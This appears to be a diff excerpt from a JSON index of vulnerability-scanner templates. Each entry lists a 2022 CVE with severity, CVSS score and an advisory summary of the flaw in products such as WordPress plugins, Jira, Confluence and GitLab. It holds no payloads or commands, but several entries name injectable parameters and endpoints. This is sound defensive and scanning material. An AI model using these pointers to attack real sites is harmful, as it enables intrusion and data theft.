{"ID":"CVE-2022-0535","Info":{"Name":"WordPress E2Pdf \u003c1.16.45 - Cross-Site Scripting","Severity":"medium","Description":"WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2022/CVE-2022-0535.yaml"}
{"ID":"CVE-2022-0540","Info":{"Name":"Atlassian Jira Seraph - Authentication Bypass","Severity":"critical","Description":"Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0540.yaml"}
{"ID":"CVE-2022-0591","Info":{"Name":"Formcraft3 \u003c3.8.28 - Server-Side Request Forgery","Severity":"critical","Description":"Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0591.yaml"}
{"ID":"CVE-2022-0594","Info":{"Name":"WordPress Shareaholic \u003c9.7.6 - Information Disclosure","Severity":"medium","Description":"WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0594.yaml"}
{"ID":"CVE-2022-0595","Info":{"Name":"WordPress Contact Form 7 \u003c1.3.6.3 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0595.yaml"}
{"ID":"CVE-2022-0597","Info":{"Name":"Microweber \u003c 1.2.11 - Open Redirection","Severity":"medium","Description":"Open Redirect in Packagist microweber/microweber prior to 1.2.11.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0597.yaml"}
{"ID":"CVE-2022-0599","Info":{"Name":"WordPress Mapping Multiple URLs Redirect Same Page \u003c=5.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0599.yaml"}
{"ID":"CVE-2022-0651","Info":{"Name":"WordPress Plugin WP Statistics \u003c= 13.1.5 - SQL Injection","Severity":"high","Description":"The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0651.yaml"}
{"ID":"CVE-2022-0653","Info":{"Name":"Wordpress Profile Builder Plugin Cross-Site Scripting","Severity":"medium","Description":"The Profile Builder User Profile \u0026 User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0653.yaml"}
{"ID":"CVE-2022-0656","Info":{"Name":"uDraw \u003c3.3.3 - Local File Inclusion","Severity":"high","Description":"uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0656.yaml"}
{"ID":"CVE-2022-0658","Info":{"Name":"CommonsBooking \u003c 2.6.8 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0658.yaml"}
{"ID":"CVE-2022-0660","Info":{"Name":"Microweber \u003c1.2.11 - Information Disclosure","Severity":"high","Description":"Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0660.yaml"}
{"ID":"CVE-2022-0678","Info":{"Name":"Microweber \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0678.yaml"}
{"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0679.yaml"}
@ -1475,7 +1541,9 @@
{"ID":"CVE-2022-0784","Info":{"Name":"WordPress Title Experiments Free \u003c9.0.1 - SQL Injection","Severity":"critical","Description":"WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0784.yaml"}
{"ID":"CVE-2022-0785","Info":{"Name":"WordPress Daily Prayer Time \u003c2022.03.01 - SQL Injection","Severity":"critical","Description":"WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0785.yaml"}
{"ID":"CVE-2022-0786","Info":{"Name":"WordPress KiviCare \u003c2.3.9 - SQL Injection","Severity":"critical","Description":"WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0786.yaml"}
{"ID":"CVE-2022-0787","Info":{"Name":"Limit Login Attempts (Spam Protection) \u003c 5.1 - SQL Injection","Severity":"critical","Description":"The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0787.yaml"}
{"ID":"CVE-2022-0788","Info":{"Name":"WordPress WP Fundraising Donation and Crowdfunding Platform \u003c1.5.0 - SQL Injection","Severity":"critical","Description":"WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0788.yaml"}
{"ID":"CVE-2022-0814","Info":{"Name":"Ubigeo de Peru \u003c 3.6.4 - SQL Injection","Severity":"critical","Description":"The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0814.yaml"}
{"ID":"CVE-2022-0817","Info":{"Name":"WordPress BadgeOS \u003c=3.7.0 - SQL Injection","Severity":"critical","Description":"WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0817.yaml"}
{"ID":"CVE-2022-0824","Info":{"Name":"Webmin \u003c1.990 - Improper Access Control","Severity":"high","Description":"Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-0824.yaml"}
{"ID":"CVE-2022-0826","Info":{"Name":"WordPress WP Video Gallery \u003c=1.7.1 - SQL Injection","Severity":"critical","Description":"WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0826.yaml"}
@ -1486,6 +1554,7 @@
{"ID":"CVE-2022-0869","Info":{"Name":"nitely/spirit 0.12.3 - Open Redirect","Severity":"medium","Description":"Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0869.yaml"}
{"ID":"CVE-2022-0870","Info":{"Name":"Gogs \u003c0.12.5 - Server-Side Request Forgery","Severity":"medium","Description":"Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0870.yaml"}
{"ID":"CVE-2022-0885","Info":{"Name":"Member Hero \u003c=1.0.9 - Remote Code Execution","Severity":"critical","Description":"WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0885.yaml"}
{"ID":"CVE-2022-0899","Info":{"Name":"Header Footer Code Manager \u003c 1.1.24 - Cross-Site Scripting","Severity":"medium","Description":"The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0899.yaml"}
{"ID":"CVE-2022-0928","Info":{"Name":"Microweber \u003c 1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0928.yaml"}
{"ID":"CVE-2022-0948","Info":{"Name":"WordPress Order Listener for WooCommerce \u003c3.2.2 - SQL Injection","Severity":"critical","Description":"WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0948.yaml"}
{"ID":"CVE-2022-0949","Info":{"Name":"WordPress Stop Bad Bots \u003c6.930 - SQL Injection","Severity":"critical","Description":"WordPress Stop Bad Bots plugin before 6.930 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0949.yaml"}
@ -1503,6 +1572,7 @@
{"ID":"CVE-2022-1119","Info":{"Name":"WordPress Simple File List \u003c3.2.8 - Local File Inclusion","Severity":"high","Description":"WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1119.yaml"}
{"ID":"CVE-2022-1162","Info":{"Name":"GitLab CE/EE - Hard-Coded Credentials","Severity":"critical","Description":"GitLab CE/EE contains a hard-coded credentials vulnerability. A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML), allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Affected versions are 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-1162.yaml"}
{"ID":"CVE-2022-1168","Info":{"Name":"WordPress WP JobSearch \u003c1.5.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WP JobSearch plugin prior to 1.5.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1168.yaml"}
{"ID":"CVE-2022-1170","Info":{"Name":"JobMonster \u003c 4.5.2.9 - Cross-Site Scripting","Severity":"medium","Description":"In the theme JobMonster \u003c 4.5.2.9 there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1170.yaml"}
{"ID":"CVE-2022-1221","Info":{"Name":"WordPress Gwyn's Imagemap Selector \u003c=0.3.3 - Cross-Site Scripting","Severity":"medium","Description":"Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1221.yaml"}
{"ID":"CVE-2022-1329","Info":{"Name":"Elementor Website Builder - Remote Code Execution","Severity":"high","Description":"The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-1329.yaml"}
{"ID":"CVE-2022-1386","Info":{"Name":"WordPress Fusion Builder \u003c3.6.2 - Server-Side Request Forgery","Severity":"critical","Description":"WordPress Fusion Builder plugin before 3.6.2 is susceptible to server-side request forgery. The plugin does not validate a parameter in its forms, which can be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. An attacker can potentially interact with hosts on the server's local network, bypass firewalls, and access control measures.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-1386.yaml"}
@ -1539,6 +1609,7 @@
{"ID":"CVE-2022-21587","Info":{"Name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","Severity":"critical","Description":"Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-21587.yaml"}
{"ID":"CVE-2022-21661","Info":{"Name":"WordPress \u003c5.8.3 - SQL Injection","Severity":"high","Description":"WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-21661.yaml"}
{"ID":"CVE-2022-21705","Info":{"Name":"October CMS - Remote Code Execution","Severity":"high","Description":"October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-21705.yaml"}
{"ID":"CVE-2022-2174","Info":{"Name":"microweber 1.2.18 - Cross-site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2174.yaml"}
{"ID":"CVE-2022-2185","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"high","Description":"GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-2185.yaml"}
{"ID":"CVE-2022-2187","Info":{"Name":"WordPress Contact Form 7 Captcha \u003c0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2187.yaml"}
{"ID":"CVE-2022-2219","Info":{"Name":"Unyson \u003c 2.7.27 - Cross Site Scripting","Severity":"high","Description":"The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-2219.yaml"}
@ -1596,8 +1667,11 @@
{"ID":"CVE-2022-24990","Info":{"Name":"TerraMaster TOS \u003c 4.2.30 Server Information Disclosure","Severity":"high","Description":"TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24990.yaml"}
{"ID":"CVE-2022-25082","Info":{"Name":"TOTOLink - Unauthenticated Command Injection","Severity":"critical","Description":"TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-25082.yaml"}
{"ID":"CVE-2022-25125","Info":{"Name":"MCMS 5.2.4 - SQL Injection","Severity":"critical","Description":"MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-25125.yaml"}
{"ID":"CVE-2022-25148","Info":{"Name":"WordPress Plugin WP Statistics \u003c= 13.1.5 - SQL Injection","Severity":"critical","Description":"The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-25148.yaml"}
{"ID":"CVE-2022-25149","Info":{"Name":"WordPress Plugin WP Statistics \u003c= 13.1.5 - SQL Injection","Severity":"high","Description":"The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-25149.yaml"}
{"ID":"CVE-2022-25216","Info":{"Name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","Severity":"high","Description":"DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-25216.yaml"}
{"ID":"CVE-2022-25323","Info":{"Name":"ZEROF Web Server 2.0 - Cross-Site Scripting","Severity":"medium","Description":"ZEROF Web Server 2.0 allows /admin.back cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-25323.yaml"}
{"ID":"CVE-2022-2535","Info":{"Name":"SearchWP Live Ajax Search \u003c 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure","Severity":"medium","Description":"The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2535.yaml"}
{"ID":"CVE-2022-25356","Info":{"Name":"Alt-n/MDaemon Security Gateway \u003c=8.5.0 - XML Injection","Severity":"medium","Description":"Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-25356.yaml"}
{"ID":"CVE-2022-25369","Info":{"Name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","Severity":"critical","Description":"Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-25369.yaml"}
{"ID":"CVE-2022-2544","Info":{"Name":"WordPress Ninja Job Board \u003c 1.3.3 - Direct Request","Severity":"high","Description":"WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-2544.yaml"}
@ -1610,6 +1684,7 @@
{"ID":"CVE-2022-25489","Info":{"Name":"Atom CMS v2.0 - Cross-Site Scripting","Severity":"medium","Description":"Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the \"A\" parameter in /widgets/debug.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-25489.yaml"}
{"ID":"CVE-2022-25497","Info":{"Name":"Cuppa CMS v1.0 - Local File Inclusion","Severity":"medium","Description":"CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-25497.yaml"}
{"ID":"CVE-2022-2551","Info":{"Name":"WordPress Duplicator \u003c1.4.7 - Authentication Bypass","Severity":"high","Description":"WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-2551.yaml"}
{"ID":"CVE-2022-25568","Info":{"Name":"MotionEye Config Info Disclosure","Severity":"high","Description":"MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-25568.yaml"}
{"ID":"CVE-2022-2599","Info":{"Name":"WordPress Anti-Malware Security and Brute-Force Firewall \u003c4.21.83 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2599.yaml"}
{"ID":"CVE-2022-26134","Info":{"Name":"Confluence - Remote Code Execution","Severity":"critical","Description":"Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26134.yaml"}
{"ID":"CVE-2022-26138","Info":{"Name":"Atlassian Questions For Confluence - Hardcoded Credentials","Severity":"critical","Description":"Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26138.yaml"}
@ -1677,6 +1752,7 @@
{"ID":"CVE-2022-31269","Info":{"Name":"Linear eMerge E3-Series - Information Disclosure","Severity":"high","Description":"Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-31269.yaml"}
{"ID":"CVE-2022-31299","Info":{"Name":"Haraj 3.7 - Cross-Site Scripting","Severity":"medium","Description":"Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-31299.yaml"}
{"ID":"CVE-2022-31373","Info":{"Name":"SolarView Compact 6.00 - Cross-Site Scripting","Severity":"medium","Description":"SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-31373.yaml"}
{"ID":"CVE-2022-3142","Info":{"Name":"NEX-Forms Plugin \u003c 7.9.7 - SQL Injection","Severity":"high","Description":"The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-3142.yaml"}
{"ID":"CVE-2022-31474","Info":{"Name":"BackupBuddy - Local File Inclusion","Severity":"high","Description":"BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-31474.yaml"}
{"ID":"CVE-2022-31499","Info":{"Name":"Nortek Linear eMerge E3-Series \u003c0.32-08f - Remote Command Injection","Severity":"critical","Description":"Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31499.yaml"}
{"ID":"CVE-2022-31656","Info":{"Name":"VMware - Local File Inclusion","Severity":"critical","Description":"VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31656.yaml"}
@ -1708,6 +1784,7 @@
